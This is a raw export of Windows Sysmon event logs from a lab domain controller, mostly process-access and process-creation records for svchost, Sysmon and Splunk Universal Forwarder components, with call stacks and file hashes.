13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-92EA-6005-C404-00000000A301}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92EA-6005-C404-00000000A301}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.066{59A5CD1D-92EA-6005-C404-00000000A301}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.158{59A5CD1D-92EB-6005-C504-00000000A301}51163804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92EB-6005-C504-00000000A301}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-92EB-6005-C504-00000000A301}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92EB-6005-C504-00000000A301}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:47.033{59A5CD1D-92EB-6005-C504-00000000A301}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.830{59A5CD1D-92EC-6005-C704-00000000A301}28203224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92EC-6005-C704-00000000A301}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 